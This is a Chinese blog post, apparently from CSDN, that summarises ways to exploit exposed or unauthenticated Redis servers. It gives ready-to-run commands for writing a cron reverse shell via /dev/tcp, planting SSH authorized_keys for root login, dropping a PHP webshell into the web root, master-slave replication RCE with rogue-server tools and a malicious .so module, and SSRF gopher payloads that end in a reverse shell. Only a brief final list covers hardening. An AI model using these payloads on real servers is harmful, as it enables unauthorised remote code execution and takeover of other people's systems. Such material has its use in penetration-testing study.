redis利用总结

最新推荐文章于 2023-05-13 23:41:46 发布
最新推荐文章于 2023-05-13 23:41:46 发布
阅读量1.1k 收藏 1
点赞数
分类专栏: redis 文章标签: redis 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/127077514
版权

1.利用计划任务反弹shell

kali安装redis-cli

https://blog.csdn.net/Fly_hps/article/details/102690282s

kali监听9999端口

nc -lnvp 9999

远程访问不了把protected-mode改成no 

redis-cli -h ip -p 6379

set  xx   "\n* * * * * bash -i >& /dev/tcp/192.168.1.53/9999 0>&1\n"

config set dir /var/spool/cron/

config set dbfilename root

save

另一种代码形式

echo -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/10.1.1.1/1234 0>&1\n\n"|redis-cli -h 192.168.118.129 -x set 1
redis-cli -h 192.168.118.129 config set dir /var/spool/cron/
redis-cli -h 192.168.118.129 config set dbfilename root
redis-cli -h 192.168.118.129 save

 2.redis 密钥登录ssh

生成密钥公钥

ssh-keygen -t rsa

防止乱码 导出key

(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > key.txt

导入内容

cat key.txt | redis-cli -h 192.168.0.108 --pass pass123 -x set xxx

--pass是登录密码 无密码可不填

设置路径

config set dir /root/.ssh

设置文件名

config set dbfilename authorized_keys

保存

save

ssh 登录

ssh -i id_rsa root@192.168.0.108

3.redis 写webshell

192.168.1.109:6379> config set dir /var/www/html/

192.168.1.109:6379> config set dbfilename shell.php

192.168.1.109:6379> set x "<?php phpinfo();?>"

192.168.1.109:6379> save

访问结果 

4.利用主从复制RCE

漏洞存在于4.x、5.x版本中,Redis提供了主从模式,主从模式指使用一个redis作为主机,其他的作为备份机,主机从机数据都是一样的,从机只负责读,主机只负责写。在Reids 4.x之后,通过外部拓展,可以实现在redis中实现一个新的Redis命令,构造恶意.so文件。在两个Redis实例设置主从模式的时候,Redis的主机实例可以通过FULLRESYNC同步文件到从机上。然后在从机上加载恶意so文件,即可执行命令。

受害人 就是从机  so文件

攻击者就是主机 so文件

工具下载

https://github.com/n0b0dyCN/redis-rogue-server

https://github.com/Testzero-wz/Awsome-Redis-Rogue-Server

python3 redis-rogue-server.py -rhost 192.168.1.109 -lhost 192.168.1. 53 -passwd password

反弹shell

监听端口 nc -lvnp 2333

成功反弹shell

 5.ssrf redis 反弹shell

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dir%2520/tmp/%250d%250aquit

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520exp.so%250d%250aslaveof%2520192.168.0.119%252021000%250d%250aquit

导入模块

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250amodule%2520load%2520./exp.so%250d%250aquit

关闭主从

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aslaveof%2520NO%2520ONE%250d%250aquit

设置数据库名

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250aconfig%2520set%2520dbfilename%2520dump.rdb%250d%250aquit

反弹shell

gopher://0.0.0.0:6379/_auth%2520welcometowangdingbeissrfme6379%250d%250asystem.rev%2520192.168.0.119%25206666%250d%250aquit

6.本地redis主从复制RCE 反弹shell

kali 命令

nc -lvnp 2333

python3 redis_rogue_server.py -v -path module.so

 ubuntu上操作

config set dir /tmp

config set dbfilename exp.so

slaveof 192.168.0.119 21000

module load ./exp.so

slaveof NO ONE

system.rev 192.168.0.119 2333

 7.redis安全设置

  1. 单独为redis设置一个普通账号 启动redis
  2. 设置本地 localhost 不允许外部访问
  3. 保护模式开启 protected-mode 开启 (默认开启)
  4. 把端口最好更改
  5. requirepass 设置redis密码

——————————————————————————————————————————————————————————————————————放弃也是需要勇气的

 

夜yesec
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
实用手册redis全面总结
11-29
### 实用手册:Redis全面总结 #### 一、Redis简介 **Redis**(Remote Dictionary Server)是一种开源的、高性能的键值(Key-Value)存储系统。它支持多种数据结构,如字符串(strings)、散列(hashes)、列表...
Redis个人总结
03-08
在个人总结中,我们可以看到Redis主要使用了五种数据结构,分别是String、List、Set、Hash和ZSet,每种都有其独特的特性和用途。 1. String(字符串,数值) String是最基础的数据类型,可以存储简单的键值对,值...
介绍Redis的各种用途以及使用场景
热门推荐
u011277123的博客
12-02 12万+
专注JavaWeb开发 2017-11-22 10:10:36 Redis 一、为什么使用 解决应用服务器的cpu和内存压力 减少io的读操作,减轻io的压力 关系型数据库的扩展性不强,难以改变表结构 二、优点: nosql数据库没有关联关系,数据结构简单,拓展表比较容易 nosql读取速度快,对较大数据处理快 三、适用场景:
Redis利用方式总结(Linux/Windows)
weixin_50464560的博客
11-02 4819
原文在这:https://blog.csdn.net/qq_26091745/article/details/117222362?utm_source=app&app_version=4.17.2&code=app_1562916241&uLinkId=usr1mkqgl919blen 简述 本文收录整理了https://xz.aliyun.com/t/7940 https://www.redmango.top/article/51 等文章 感谢作者们无私分享利用redis优秀姿
Redis利用方式及工具分析
寒星的博客
08-21 1051
前言 网上目前的很多文章已经总结redis利用方式,但是并没有详细解释利用原理和可能出现的问题,在利用时经常遇到一些意想不到的坑,这里主要总结常见的redis攻击方式,以及对网上一些利用工具的研究和改良 redis的getshell方式主要有三种: 写文件 主从复制 lua rce lua rce仅适用3.x以下的版本,且公开内容不多,暂时跳过,主要分析写文件和主从复制。 写文件 写文件常见的方式有: 写定时任务 写ssh公钥 写webshell 这三种思路利用原理完全一致,都是利用redis.
记录一次Redis未授权getshell几种常见方法
qq_45888826的博客
09-17 3859
记录一次Redis未授权getshell几种常见方法
Redis常见漏洞利用方法总结1
08-03
Redis(Remote Dictionary Server ),即远程字典服务,是个开源的使 ANSI C 语编写、持络、可基于内存亦可持久化的志型、Key-
Spring-data-redis操作redis知识总结
08-30
1. **连接池管理**:Spring-data-redis自动管理Redis连接池,确保高效的资源利用。它封装了`RedisTemplate`类,该类是操作Redis的核心组件。 2. **API封装**:它对Jedis客户端的大量API进行了归类和封装,将相似...
Redis学习总结.doc
07-27
### Redis学习总结 #### 一、Redis简介与特点 Redis是一个开源(BSD许可)的,内存中的数据结构存储系统,可以用作数据库缓存和消息中间件。它提供了丰富的数据结构,并支持网络发布/订阅模式。与其他键值存储...
Redis未授权漏洞利用
tangshuangsss的专栏
01-04 633
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
redisredis动态配置config set
michaelwoshi的博客
07-06 1323
redis的使用过程中,有时候需要急需修改redis的配置,比如在业务运行的情况下,内存不够怎么办,这时要么赶紧删除无用的内存,要么扩展内存。 如果有无用的内容可删除那么所有问题都已经解决,如果内容都是重要的,那只能选择扩展内存。 设置实例可用最大内存 > config get maxmemory > config set maxmemory 4294967296 > config rewrite redis.conf中的maxmemory定义REd...
漏洞复现----22、Redis未授权访问漏洞
七天
07-15 1808
文章目录一、简介二、漏洞环境三、漏洞复现1、未授权访问2、写入webshell3、利用公私钥获取root权限4、计划任务反弹shell 一、简介 Redis是一个开源的使用ANSI C语言编写、支持网络、可基于内存也可以持久化的日执行、Key-Value数据库Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有添加防火墙规则避免其他非信任来源 ip 访问等策略时,会将 Redis 服务暴露到公网上;如果在没有设置密码认证(一般为空)的情况下,会导致任意用户未授权访问 Redis 以及
Redis的介绍及基本使用
最新发布
qq_47075878的博客
05-13 1641
学习尚硅谷的Redis学习时所做的笔记。
RedisConfig SET/GET命令用法详解
IT之一小佬的博客
01-08 1175
RedisConfig Set命令用法详解
redisRDB持久化中dir路径配置问题
qq_40774676的博客
06-22 4517
redisRDB持久化中dir路径解析 ​ dir ./ 指定生成rdb文件的路径 相对路径受到启动redis的操作路径的影响。 redis读取rdb文件: [root@localhost my-conf]# ls redis01.conf [root@localhost my-conf]# redis-server redis01.conf 19528:C 22 Jun 2021 17:08:19.985 # oO0OoO0OoO0Oo Redis is starting
redis config配置
qq_36575363的博客
02-19 1001
# vi redis.conf daemonize yes #是否以后台进程运行 pidfile /var/run/redis/redis-server.pid #pid文件位置 port 6379#监听端口 bind 127.0.0.1 #绑定地址,如外网需要连接,设置0.0.0.0 timeout 300 #连接超时时间,单位秒 loglevel notice #日志级别,分别有: # debug :适用于开发和测试 # verbose :更详细信息 # notice :适用...
Redis服务入侵记
一枚小白的分享,不喜勿喷~
08-22 903
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
redis漏洞利用总结
越努力 越自由
10-17 6493
redis属于非关系型数据库,在开启后默认监听端口为6379。若Redis配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,存在未授权访问,弱口令或者口令泄露等主从复制,是指将一台Redis服务器的数据,复制到其他的Redis服务器。前者称为主节点(master),后者称为从节点(slave);数据的复制是单向的,只能由主节点到从节点。Redis的持久化使得机器即使重启数据也不会丢失,因为redis服务器重启后会把硬盘上的文件重新恢复到内存中。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值